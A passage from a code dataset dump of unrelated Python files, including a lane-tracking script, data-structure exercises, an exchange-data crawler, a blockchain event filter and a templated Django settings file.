output\n","sub_path":"csci1133/frisk028_4B.py","file_name":"frisk028_4B.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"161227945","text":"from src.logger import Log\nfrom src.lane_tracker import LaneLinesTracker\nfrom examples import *\n\n\ndef ProcessProjectVideo(subclip_seconds=None):\n    Log.section(\"Project Video\")\n\n    input_file = \"project_video.mp4\"\n    output_file = \"output_videos/project_video.mp4\"\n\n    tracker = LaneLinesTracker()\n    clip = tracker.process_video(input_file, output_file, subclip_seconds)\n    return output_file\n\n\ndef main():\n    Log.debug_enabled = False\n    # RunCalibrationExample()\n    # RunDistortionCorrectionExample()\n    # RunEdgeDetectionExample()\n    # RunPerspectiveTransformExample()\n    # RunLaneFittingExample()\n    # RunFullPipelineExample()\n\n    ProcessProjectVideo(subclip_seconds=None)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"558442491","text":"def palindromePermutation(word):\n    dict={}\n    for c in word:\n        if (c!=\" \"):\n            if (c not in dict):\n                dict[c] = 1\n            else:\n                x = dict[c]\n                dict.update({c: x+1})\n    # a permutation of a palindrome allows at most one character with an odd count\n    odd_counts = 0\n    for x in dict:\n        if dict[x]%2==1:\n            odd_counts+=1\n    return odd_counts <= 1\n\ndef main():\n    print(palindromePermutation(\"braid\"))\n\nif __name__ == \"__main__\":\n    main()","sub_path":"Problem4.py","file_name":"Problem4.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"366696302","text":"import pygame\nimport tileset\n\n\nclass Sprite(pygame.sprite.Sprite):\n    def __init__(self, pos, frame):\n        super(Sprite, self).__init__()\n        SPRITE_CACHE = tileset.TileCache(32, 32)\n        images = SPRITE_CACHE.__getitem__('data/tileset.png')\n        self.image = pygame.Surface([32, 32])\n        self.image = images[frame[0]][frame[1]]\n        self.rect = self.image.get_rect()\n        self.pos = pos\n        self._set_pos(pos)\n\n    def _get_pos(self):\n        \"\"\"Check the current position of the sprite on the map.\"\"\"\n        return (self.rect.topleft[0]/32), (self.rect.topleft[1]/32)\n\n    def _set_pos(self, pos):\n        \"\"\"Set the position and depth of the sprite on the map.\"\"\"\n        self.rect.topleft = (pos[0]*32), (pos[1]*32)\n        self.depth = self.rect.midbottom[1]\n\n    def move(self, dx, dy):\n        \"\"\"Change the position of the sprite on screen.\"\"\"\n        self.rect.move_ip(dx, dy)\n        self.depth = self.rect.midbottom[1]\n","sub_path":"outpost/sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"16605010","text":"# class definition\nclass BookReader: # declare the BookReader class\n    name = str() # declare a string variable, name\n\n    def read_book(self):\n        print(self.name + ' is reading Book!!')\n\n\nreader = BookReader()\nprint(type(reader))\n\nreader.name = 
'Twise'\nreader.read_book()","sub_path":"Sect-A/source/sect07_class/temp/s720_def_class.py","file_name":"s720_def_class.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"450393316","text":"import sys\n#\n# >>> Write the mapper code from this point on <<<\n#\nif __name__ == \"__main__\":\n    for line in sys.stdin:\n        key = line.strip()[0]\n        date = line.split('\\t')[0].split()[1]\n        valor = line.split('\\t')[0].split()[2]\n        print(\"{},{},{}\\t\".format(key,date,valor))\n","sub_path":"01-hadoop-50/q07-10/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"371299463","text":"#!/usr/bin/env python\n#\n#\n#\n# @Author: LeShadow\n# @Date: 2013-11-19 10:39:37\n# @Last Modified by: LeShadow\n# @Last Modified time: 2013-11-22 20:15:09\n#\n#\n##################################################\nclass DL_Chain:\n\t'''\n\tImplementation of a doubly linked open chain in Python\n\tThis is just a draft; it might be extended in the very near future\n\t'''\t\n\tdef __init__(self):\n\t\t'''\n\t\tConstructor which initializes the list \n\t\tIt also initializes the head and the tail of the DL_Chain\n\t\t'''\t\t\n\t\tself.list = []\n\t\tself.head = None\n\t\tself.tail = None\n\n\tdef insert(self, data):\n\t\t'''\n\t\tIn this function you can add items; it will also automatically update their next_pointers and prev_pointers to the next and previous item in the chain\n\t\tIf something goes wrong with adding an item, it will return False, else it will return True\n\t\t'''\t\t\n\t\tif len(self.list) == 0:\n\t\t\ttry:\n\t\t\t\tlist_item_data = DL_Node(data, None)\n\t\t\t\tself.head = list_item_data\n\t\t\t\tself.tail = list_item_data\n\t\t\t\tself.list.insert(len(self.list), list_item_data)\n\t\t\t\treturn True\n\t\t\texcept:\n\t\t\t\treturn False\n\t\telse:\n\t\t\ttry:\t\n\t\t\t\tlist_item_data = DL_Node(data, self.list[len(self.list)-1])\n\t\t\t\tself.tail = list_item_data\n\t\t\t\tself.list.insert(len(self.list), list_item_data)\n\t\t\t\treturn True\n\t\t\texcept:\n\t\t\t\treturn False\n\n\tdef remove(self, index):\n\t\t'''\n\t\tIn this function, you can remove a Node; if the given index is out of bounds it will raise an exception\n\t\tThis function will also auto-update the pointers of the other Nodes when one Node is removed.\n\t\t'''\t\t\n\t\tif isinstance(index, int):\n\t\t\tif index > (len(self.list)-1):\n\t\t\t\traise Exception(\"Index is out of bounds\")\n\t\t\telse:\n\t\t\t\tif index == (len(self.list)-1):\n\t\t\t\t\tself.tail = self.list[index-1]\n\t\t\t\t\tself.list.pop(index)\n\t\t\t\t\tself.list[index-1].next_ptr = None\n\t\t\t\t\treturn True\n\t\t\t\telif index == 0:\n\t\t\t\t\tself.head = self.list[1]\n\t\t\t\t\tself.list.pop(index)\n\t\t\t\t\tself.list[0].prev_ptr = None\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\t\n\t\t\t\t\tself.list[index-1].next_ptr = self.list[index].next_ptr\n\t\t\t\t\tself.list[index+1].prev_ptr = self.list[index].prev_ptr\n\t\t\t\t\tself.list.pop(index)\n\t\t\t\t\treturn True\n\n\t\telse:\n\t\t\traise Exception(\"The index has to be of the type integer.\")\n\t\t\treturn False\n\n\t\t\n\n\n\tdef retrieve(self, index):\n\t\t'''\n\t\tIn this function, you can retrieve a Node; if the given index is out of bounds it will raise an exception\n\t\t'''\t\t\t\t\n\t\tif isinstance(index, int):\n\t\t\tif index > (len(self.list)-1) or 
index < 0:\n\t\t\t\traise Exception(\"Index is out of bounds\")\n\t\t\telse:\n\t\t\t\treturn self.list[index]\n\n\t\telse:\n\t\t\traise Exception(\"The index has to be of the type integer.\")\n\t\t\treturn False\n\n\tdef isEmpty(self):\n\t\t'''\n\t\tThis function will check if the chain is empty or not\n\t\t'''\t\t\n\t\tif len(self.list) == 0:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef getLength(self):\n\t\t'''\n\t\tThis function will return the entire length of the chain\n\t\t'''\n\t\treturn len(self.list)\t\t\n\n\n\nclass DL_Node:\n\t'''\n\tThis class will create the node that will be added to the chain\n\t'''\n\tdef __init__(self, data, prev_node = None, next_node = None):\n\t\t'''\n\t\tThe Constructor will initialize the necessary variables\n\t\tIt will also create the data, and if needed, the next_pointer and the prev_pointer\n\t\t'''\t\t\n\t\tself.next_ptr = None\n\t\tself.data = None\n\t\tself.prev_ptr = None\n\n\t\tif prev_node != None and prev_node != 0:\n\n\t\t\tself.next_ptr = None\n\t\t\tprev_node.next_ptr = self\n\t\t\tself.prev_ptr = prev_node\n\t\t\tself.data = data\n\t\t\t\n\t\telse:\n\t\t\tself.prev_ptr = None\n\t\t\tself.next_ptr = None\n\t\t\tself.data = data\n\n\n\tdef next(self):\n\t\t'''\n\t\tThis function will return the next element in the chain\n\t\t'''\t\t\n\t\treturn self.next_ptr\n\n\n","sub_path":"Opdr1 + Opdr2 + Opdr3/Opdr1-Shadow/dlchain.py","file_name":"dlchain.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"126319791","text":"class Solution:\n    def solveNQueens(self, n: int):\n        board = [['.']*n for _ in range(n)]\n\n        def is_valid(board, r, c):\n            for i in range(n):\n                for j in range(n):\n                    if board[i][j] == 'Q' and (i == r or j == c or abs(i-r) == abs(j-c)):\n                        return False\n            return True\n\n        res = []\n\n        def recall(board, row):\n            if row == n:\n                res.append([''.join(i) for i in board])\n                return\n            for c in range(n):\n                if not is_valid(board, row, c):\n                    continue\n                board[row][c] = 'Q'\n                recall(board, row + 1)\n                board[row][c] = '.'\n\n        recall(board, 0)\n        return res\n\n\nif __name__ == '__main__':\n    s = Solution()\n    res = s.solveNQueens(4)\n    print(len(res), res)\n# 23","sub_path":"code_practice/dfs/eight_queen.py","file_name":"eight_queen.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"278386775","text":"import time\nimport numpy as np\nfrom datetime import datetime\n\nfrom urllib import request\nfrom urllib.parse import urlencode\nfrom urllib.request import Request, urlopen\n\nfrom tqdm import tqdm\n\n\nCHROMEHEAD = {\n    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n    'Accept-Encoding': 'gzip, deflate',\n    'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n    'Cache-Control': 'max-age=0',\n    'Content-Length': 84,\n    'Content-Type': 'application/x-www-form-urlencoded',\n    'Host': 'www.dce.com.cn',\n    'Origin': 'http://www.dce.com.cn',\n    'Proxy-Connection': 'keep-alive',\n    'Referer': None,\n    'Upgrade-Insecure-Requests': 1,\n    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n    }\n\ndef show_download(a, b, c):\n    per = 100.0 * a * b / c\n    if per > 100:\n        per = 100\n    print ('%.2f%%' % per)\n\nclass DashangCrawler:\n    \"\"\"Data crawler for the Dalian Commodity Exchange (DCE); mainly fetches the daily trading data.\n\n    Key attributes:\n        headers: uses the Chrome header set; note that no cookies are needed at all, so there is no point in scraping them\n    \"\"\"\n    def __init__(self):\n        self.url = 'http://www.dce.com.cn/publicweb/quotesdata/exportDayQuotesChData.html'\n        self.headers = CHROMEHEAD\n        # self.headers['Content-Length'] = 84\n        self.headers['Referer'] = self.url\n        opener = request.build_opener()\n        opener.addheaders = list(self.headers.items())\n        request.install_opener(opener)\n\n    def get_daily_data(self, date, type_of_goods='all',trade_type=0, download_filetype='txt', suffix='csv'):\n        \"\"\"Fetch data for a given date and save it under the '../data/dashang_data/' folder, named as commodity_date\n\n        args:\n            date: a datetime; declare it in the style datetime.datetime(2018, 4, 3)\n            type_of_goods: maps to 'dayQuotes.variety' in the request post data, i.e. the commodity class, default: all\n            trade_type: maps to 'trade_type' in the request post data\n            download_filetype: file type to download, txt by default; the DCE api supports txt and excel\n            suffix: suffix of the saved file, csv by default so that pandas.read_csv is convenient\n\n        note:\n            the DCE api does not reject invalid dates; if there is no data for that day it simply downloads an empty table.\n        \"\"\"\n        if download_filetype == 'excel': # if an excel file is downloaded, switch the file suffix to xls\n            suffix = 'xls'\n\n        values = {\n            'dayQuotes.variety': type_of_goods,\n            'dayQuotes.trade_type': trade_type,\n            'year': date.year,\n            'month': date.month-1,\n            'day': str(date.day) if date.day > 9 else '0%s' % date.day,\n            'exportFlag': download_filetype\n        }\n        \n        params = urlencode(values).encode('utf-8')\n\n        date_str = date.strftime(\"%Y-%m-%d\")\n        filename = f'../data/dashang_data/{type_of_goods}_{date_str}.{suffix}'\n\n        result = request.urlretrieve(self.url, filename, data=params)\n        return result[1].as_string()\n\n    ###################################################################################\n    # for debugging\n    #\n    # def get_index_page(self):\n    #     url = 'http://www.dce.com.cn/dalianshangpin/dalianshangpin_PAGE_KEY/index.html'\n    #     req = Request(url)\n    #     res = urlopen(req)\n    #     return res.read().decode('utf-8')\n\n    # def get_daily_page(self):\n    #     url = 'http://www.dce.com.cn/publicweb/quotesdata/dayQuotesCh.html'\n    #     self.headers.pop('Content-Length')\n    #     self.headers.pop('Content-Type')\n    #     self.headers.pop('Cache-Control')\n    #     self.headers.pop('Origin')\n    #     self.headers.pop('Referer')\n\n    #     values = {\n    #         'dayQuotes.variety': 'all',\n    #         'dayQuotes.trade_type': 0,\n    #         'year': 2019,\n    #         'month': 0,\n    #         'day': '03'\n    #     }\n    #     params = urlencode(values).encode('utf-8')\n    #     req = Request(url, headers=self.headers)\n    #     resp = urlopen(req)\n    #     return resp.read().decode('utf-8')\n    ###################################################################################\n    \ndef get_working_date():\n    \"\"\"get the 2018 working days, excluding holidays such as 2018-4-5 (the Qingming Festival)\n\n    return:\n        list\n    \"\"\"\n    holidays = ['2018-04-05', '2018-04-06', '2018-04-07', '2018-04-29',\n                '2018-04-30', '2018-05-01', '2018-06-18', '2018-09-24',\n                '2018-10-01', '2018-10-02', '2018-10-03', '2018-10-04',\n                '2018-10-05']\n    holidays = [datetime.strptime(d, '%Y-%m-%d').date() for d in holidays]\n    days = np.arange('2018-04', '2018-11', dtype='datetime64[D]')\n    days = [d.astype(datetime) for d in days]\n    work_days = [d for d in days if d.weekday() not in [5, 6] and d not in holidays]\n    return work_days\n\n\ndef main():\n    crawler = DashangCrawler()\n    taily = 0\n    print('download start')\n    days = get_working_date()\n    for i in tqdm(days, ncols=100, desc='progress:'):\n        crawler.get_daily_data(i)\n        time.sleep(0.5)\n        taily += 1\n    print('download success, ttl download %s files!' 
% taily)\n\n\nmain()\n","sub_path":"dashang_spider/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"447162979","text":"from dotenv import load_dotenv\nload_dotenv()\n\nimport os\nfrom lxml import etree\nfrom transunion import TransunionApi\nimport app as main\nfrom datetime import datetime, timezone\n\nimport unittest\n\n\nclass test_transunion(unittest.TestCase):\n\tdef test_xml(self):\n\t\targs = {\n\t\t\t'first': 'first',\n\t\t\t'middle': 'middle',\n\t\t\t'last': 'last',\n\t\t\t'address': 'address',\n\t\t\t'city': 'city',\n\t\t\t'state': 'state',\n\t\t\t'zip': '99999',\n\t\t\t'ssn': '123456789'\n\t\t}\n\t\tt = TransunionApi(args)\n\t\tt.get_request_xml()\n\t\t#make sure we're always creating a valid XML doc\n\t\tself.assertTrue(etree.fromstring(t.xml_request) is not None)\n\n\tdef test_credentials_present(self):\n\t\tself.assertTrue(\n\t\t\tos.getenv(\"SYSTEM_ID\") and\n\t\t\tos.getenv(\"ENVIRONMENT\") and\n\t\t\tos.getenv(\"TURI\") and\n\t\t\tos.getenv(\"PASSWORD\") and\n\t\t\tos.getenv(\"MARKET\") and\n\t\t\tos.getenv(\"SUBMARKET\") and\n\t\t\tos.getenv(\"INDUSTRY_CODE\") and\n\t\t\tos.getenv(\"MEMBER_CODE\") and\n\t\t\tos.getenv(\"SYSTEM_PW\") and\n\t\t\tos.getenv(\"VENDOR_ID\") and\n\t\t\tos.getenv(\"VENDOR_NAME\") and\n\t\t\tos.getenv(\"SOFTWARE_NAME\") and\n\t\t\tos.getenv(\"SOFTWARE_VERSION\") and\n\t\t\tos.getenv(\"PERMISSIBLE_PURPOSE\") and\n\t\t\tos.getenv(\"END_USER\") and\n\t\t\tos.getenv(\"CERTIFICATE_PATH\") and\n\t\t\tos.getenv(\"KEY_PATH\")\n\t\t)\n\n# class test_docusign(unittest.TestCase):\n\n# class test_mailmerge(unittest.TestCase):\nclass test_util(unittest.TestCase):\n\tdef test_credentials_present(self):\n\t\tself.assertTrue(os.getenv(\"FERNET_KEY\"))\n\n\tdef test_symmetric_enc(self):\n\t\toriginal_message = \"foo\"\n\t\tencrypted = \"\"\n\t\twith main.app.test_request_context(path=\"/util/aes/en?message=\" + original_message, method=\"GET\"):\n\t\t\tencrypted = main.get_encrypted()[\"encrypted\"]\n\t\t\tself.assertTrue(encrypted and encrypted != original_message)\n\n\t\twith main.app.test_request_context(path=\"/util/aes/de?message=\" + encrypted,method=\"GET\"):\n\t\t\tdecrypted = main.get_decrypted()\n\t\t\tself.assertTrue(decrypted.status_code == 401)\n\n\n\tdef test_unix_timestamp(self):\n\t\tmonth = \"11\"\n\t\tday = \"12\"\n\t\tyear = \"2019\"\n\t\tpath = \"/util/hubspot_timestamp?month=\" + month + \"&day=\" + day + \"&year=\" + year\n\t\twith main.app.test_request_context(path=path, method=\"GET\"):\n\t\t\ttimestamp = main.get_hubspot_timestamp()['timestamp']\n\t\t\t#make sure this works in reverse to get the original date we provided\n\t\t\t#also make sure it corresponds to time = 00:00:00, because Hubspot will annoyingly reject non-midnight values\n\t\t\tdt = datetime.fromtimestamp(timestamp/1000, tz=timezone.utc)\n\t\t\tself.assertTrue(\n\t\t\t\tdt.day == 12 and dt.month == 11 and dt.year == 2019 and\n\t\t\t\tdt.hour == 0 and dt.minute == 0 and dt.second == 0\n\t\t\t)\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"113570657","text":"from eth_utils import (\n decode_hex,\n event_abi_to_log_topic,\n)\nfrom web3 import Web3\nfrom web3.utils.abi import filter_by_type\nfrom web3.utils.events import get_event_data\nfrom eth_utils 
import to_checksum_address\nfrom web3.utils.filters import construct_event_filter_params, LogFilter\nfrom pkg_resources import DistributionNotFound\nfrom gevent.lock import Semaphore\n\nfrom raiden_contracts.contract_manager import CONTRACT_MANAGER\nfrom raiden_contracts.constants import CONTRACT_TOKEN_NETWORK, EVENT_CHANNEL_OPENED\n\nfrom raiden.utils.typing import Address, ChannelID, BlockSpecification, Dict\n\ntry:\n from eth_tester.exceptions import BlockNotFound\nexcept (ModuleNotFoundError, DistributionNotFound):\n class BlockNotFound(Exception):\n pass\n\n\ndef get_filter_args_for_specific_event_from_channel(\n token_network_address: Address,\n channel_identifier: ChannelID,\n event_name: str,\n from_block: BlockSpecification = 0,\n to_block: BlockSpecification = 'latest',\n):\n \"\"\" Return the filter params for a specific event of a given channel. \"\"\"\n if not event_name:\n raise ValueError('Event name must be given')\n\n event_abi = CONTRACT_MANAGER.get_event_abi(CONTRACT_TOKEN_NETWORK, event_name)\n\n # Here the topics for a specific event are created\n # The first entry of the topics list is the event name, then the first parameter is encoded,\n # in the case of a token network, the first parameter is always the channel identifier\n _, event_filter_params = construct_event_filter_params(\n event_abi=event_abi,\n contract_address=to_checksum_address(token_network_address),\n argument_filters={\n 'channel_identifier': channel_identifier,\n },\n fromBlock=from_block,\n toBlock=to_block,\n )\n\n return event_filter_params\n\n\ndef get_filter_args_for_all_events_from_channel(\n token_network_address: Address,\n channel_identifier: ChannelID,\n from_block: BlockSpecification = 0,\n to_block: BlockSpecification = 'latest',\n) -> Dict:\n \"\"\" Return the filter params for all events of a given channel. 
\"\"\"\n\n event_filter_params = get_filter_args_for_specific_event_from_channel(\n token_network_address=token_network_address,\n channel_identifier=channel_identifier,\n event_name=EVENT_CHANNEL_OPENED,\n from_block=from_block,\n to_block=to_block,\n )\n\n # As we want to get all events for a certain channel we remove the event specific code here\n # and filter just for the channel identifier\n # We also have to remove the trailing topics to get all filters\n event_filter_params['topics'] = [None, event_filter_params['topics'][1]]\n\n return event_filter_params\n\n\ndef decode_event(abi: Dict, log: Dict):\n \"\"\" Helper function to unpack event data using a provided ABI\n\n Args:\n abi: The ABI of the contract, not the ABI of the event\n log: The raw event data\n\n Returns:\n The decoded event\n \"\"\"\n if isinstance(log['topics'][0], str):\n log['topics'][0] = decode_hex(log['topics'][0])\n elif isinstance(log['topics'][0], int):\n log['topics'][0] = decode_hex(hex(log['topics'][0]))\n event_id = log['topics'][0]\n events = filter_by_type('event', abi)\n topic_to_event_abi = {\n event_abi_to_log_topic(event_abi): event_abi\n for event_abi in events\n }\n event_abi = topic_to_event_abi[event_id]\n return get_event_data(event_abi, log)\n\n\nclass StatelessFilter(LogFilter):\n \"\"\" Like LogFilter, but uses eth_getLogs instead of installed filter\n\n Pass latest block_number to get_(new|all)_entries to avoid querying it\n \"\"\"\n\n def __init__(self, web3: Web3, filter_params: dict):\n super().__init__(web3, filter_id=None)\n self.filter_params = filter_params\n self._last_block: int = -1\n self._lock = Semaphore()\n\n def get_new_entries(self, block_number: int = None):\n with self._lock:\n filter_params = self.filter_params.copy()\n filter_params['fromBlock'] = max(\n filter_params.get('fromBlock', 0),\n self._last_block + 1,\n )\n # This logic may contain a race condition. 
It's possible that after\n            # `web3.eth.blockNumber` and before `web3.eth.getLogs` a new block is mined.\n            # This is okay because any new logs on this new block will be fetched on the\n            # next call to `get_new_entries`\n            if block_number is None:\n                block_number = self.web3.eth.blockNumber\n            if self.filter_params.get('toBlock') in ('latest', 'pending'):\n                filter_params['toBlock'] = block_number\n            self._last_block = filter_params.get('toBlock') or block_number\n            try:\n                return self.web3.eth.getLogs(filter_params)\n            except BlockNotFound:\n                return []\n\n    def get_all_entries(self, block_number: int = None):\n        with self._lock:\n            filter_params = self.filter_params.copy()\n            if block_number is None:\n                block_number = self.web3.eth.blockNumber\n            if self.filter_params.get('toBlock') in ('latest', 'pending'):\n                filter_params['toBlock'] = block_number\n            self._last_block = filter_params.get('toBlock') or block_number\n            try:\n                return self.web3.eth.getLogs(filter_params)\n            except BlockNotFound:\n                return []\n","sub_path":"raiden/utils/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"458843792","text":"DEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n    'default': {\n        'ENGINE': 'django.db.backends.postgresql_psycopg2',\n        'NAME': 'hhservice',\n        'USER': '{{ social_vacancy_u }}',\n        'PASSWORD': '{{ social_vacancy_p }}',\n        'HOST': '{{ db_social_vacancy }}'.split(':')[0],\n        'PORT': '{{ db_social_vacancy }}'.split(':')[1],\n    }\n}\n\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': True,\n    'formatters': {\n        'verbose': {\n            'format': '%(asctime)s %(levelname)s %(module)s %(process)d %(message)s'\n        },\n    },\n    'handlers': {\n        'file': {\n            'class': 'logging.handlers.WatchedFileHandler',\n            'filename': '/var/log/hh-social-vacancy/hh-social-vacancy.log',\n            'level': 'DEBUG',\n            'formatter': 'verbose',\n        },\n        'debug_redirect': {\n            'class': 'logging.handlers.WatchedFileHandler',\n            'filename': '/var/log/hh-social-vacancy/redirect-hhsocialvacancy.log',\n            'level': 'INFO',\n            'formatter': 'verbose',\n        },\n        'syslog': {\n            'class': 'logging.handlers.SysLogHandler',\n            'formatter': 'verbose',\n            'facility': 'user',\n            'level': 'ERROR',\n            'address': '/dev/log',\n        }\n    },\n    'loggers': {\n        'django': {\n            'handlers': ['file'],\n            'level': 'INFO',\n        },\n        'hhsocialvacancy': {\n            'level': 'DEBUG',\n            'handlers': ['file'],\n        },\n        'djangocanvas': {\n            'level': 'INFO',\n            'handlers': ['file'],\n        },\n        'debug_redirect_logger': {\n            'level': 'INFO',\n            'handlers': ['debug_redirect'],\n        },\n    }\n}\n\nSTATIC_URL = '//isv.hh.ru/'\nTEMPLATE_DIRS = ('/usr/share/hh-social-vacancy/templates', )\n\n#Facebook config\nFACEBOOK_APPLICATION_ID = '{{ sv_facebook_application_id }}'\nFACEBOOK_APPLICATION_SECRET_KEY = '{{ sv_facebook_application_secret_key }}'\nFACEBOOK_APPLICATION_NAMESPACE = '{{ sv_facebook_application_namespace }}'\nFACEBOOK_APPLICATION_CANVAS_URL = '{{ sv_facebook_application_canvas_url }}'\n\n#Vkontakte config\nVK_APP_ID = '{{ sv_vk_app_id }}'\nVK_APP_SECRET = '{{ sv_vk_app_secret }}'\n\n#EXPC-157\nVACANCY_SEARCH_TIMEOUT = 24\n\n#EXPC-341\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 'https')\n\n#EXPC-344\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTOCOL', 
'https')\n","sub_path":"public/playbooks/roles/socvac/templates/etc/hh-social-vacancy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"531687038","text":"\n# -*- coding: utf-8 -*-\nimport datetime\nfrom datetime import date\n\n'''\nConverts a date of the form YYYY-MM-DD into a weekday, e.g. måndag, tisdag\n'''\ndef get_weekday(date):\n    weekday_dict = {\n        'Monday': 'Måndag', 'Tuesday': 'Tisdag', 'Wednesday': 'Onsdag', \n        'Thursday': 'Torsdag', 'Friday' : 'Fredag', 'Saturday': 'Lördag', \n        'Sunday': 'Söndag'\n    }\n    \n    weekday = date.split('-')\n    weekday = datetime.date(int(weekday[0]), int(weekday[1]), int(weekday[2]))\n    weekday = weekday.strftime('%A')\n    \n    try:\n        return weekday_dict.get(weekday)\n    except: \n        print ('Weekday not found in dictionary')\n        return None\n    \n    \n'''\nConverts input of the form '13 jul' into the corresponding number format\nYYYY-MM-DD\n'''\ndef getDate_strFormat(date_str):\n    month_dict = {\n        'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'maj': '05',\n        'jun': '06', 'jul': '07', 'aug': '08', 'sep': '09', 'okt': '10',\n        'nov': '11', 'dec': '12'\n    }\n    try:\n        year = str(date.today().year)\n        day = date_str.split()[0]\n        month = date_str.split()[1]\n        month = month_dict.get(month)\n        \n        if len(day) == 1:\n            day = '0' + day\n        elif len(day) > 2:\n            return 'Wrong date format'\n        \n        return year+'-'+month+'-'+day\n    except:\n        return 'Wrong date format'\n        \n'''\nConverts an input weekday containing three characters into its full-length format\n\ndef getWeekday_strFormat(day_str):\n    day_dict = {\n        u'Mån': u'Måndag', 'Tis': 'Tisdag', 'Ons': 'Onsdag', 'Tor': 'Torsdag', 'Fre': 'Fredag', \n        u'Lör': u'Lördag', u'Sön': u'Söndag'\n    }\n    try:\n        return day_dict.get(day_str)\n    except:\n        return 'Wrong date format'\n'''\n\n'''\nConverts an input weekday containing three characters into its full-length format\n'''\ndef getWeekday_strFormat(day_str):\n    day_dict = {\n        'Mån': 'Måndag', 'Tis': 'Tisdag', 'Ons': 'Onsdag', 'Tor': 'Torsdag', 'Fre': 'Fredag', \n        'Lör': 'Lördag', 'Sön': 'Söndag'\n    }\n    try:\n        return day_dict.get(day_str)\n    except:\n        return 'Wrong date format'\n\n'''\nConverts an input date into the correct format\n'''\ndef getDate(sDate):\n    lstDate = sDate.split('/')\n    sReturn = str(date.today().year)\n    if len(lstDate[1]) == 1:\n        sReturn += '-0%s' % lstDate[1]\n    else:\n        sReturn += '-%s' % lstDate[1]\n    \n    if len(lstDate[0]) == 1:\n        sReturn += '-0%s' % lstDate[0]\n    else:\n        sReturn += '-%s' % lstDate[0]\n    \n    return sReturn\n    \n","sub_path":"visning/management/commands/scrapers/help_functions.py","file_name":"help_functions.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"576125369","text":"\n\n# class header\nclass _TEETHE():\n\tdef __init__(self,): \n\t\tself.name = \"TEETHE\"\n\t\tself.definitions = [u'If a baby or small child is teething, their first teeth are growing, usually causing pain: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_teethe.py","file_name":"_teethe.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505691119","text":"\n\nfrom xai.brain.wordbase.nouns._ophthalmologist import 
_OPHTHALMOLOGIST\n\n# class header\nclass _OPHTHALMOLOGISTS(_OPHTHALMOLOGIST, ):\n\tdef __init__(self,): \n\t\t_OPHTHALMOLOGIST.__init__(self)\n\t\tself.name = \"OPHTHALMOLOGISTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"ophthalmologist\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_ophthalmologists.py","file_name":"_ophthalmologists.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"43633211","text":"\"\"\"\nGiven an array of integers A, let n be its length.\nAssume Bk to be an array obtained by rotating the array A k positions clock-wise,\nwe define a \"rotation function\" F on A as follows:\n\nF(k) = 0 * Bk[0] + 1 * Bk[1] + ... + (n-1) * Bk[n-1].\nCalculate the maximum value of F(0), F(1), ..., F(n-1).\nNote:\nn is guaranteed to be less than 10^5.\n\"\"\"\nclass Solution(object):\n    def maxRotateFunction(self, A):\n        \"\"\"\n        :type A: List[int]\n        :rtype: int\n        \"\"\"\n        # TLE\n        maxR = float('-inf')\n        n = len(A)\n        for i in range(n):\n            B = A[i:n] + A[:i]\n            res = 0\n            for i, v in enumerate(B):\n                res += i * v\n            maxR = max(maxR, res)\n        return maxR\n\n    def maxRotateFunction2(self, A):\n        if len(A) == 0: return 0\n        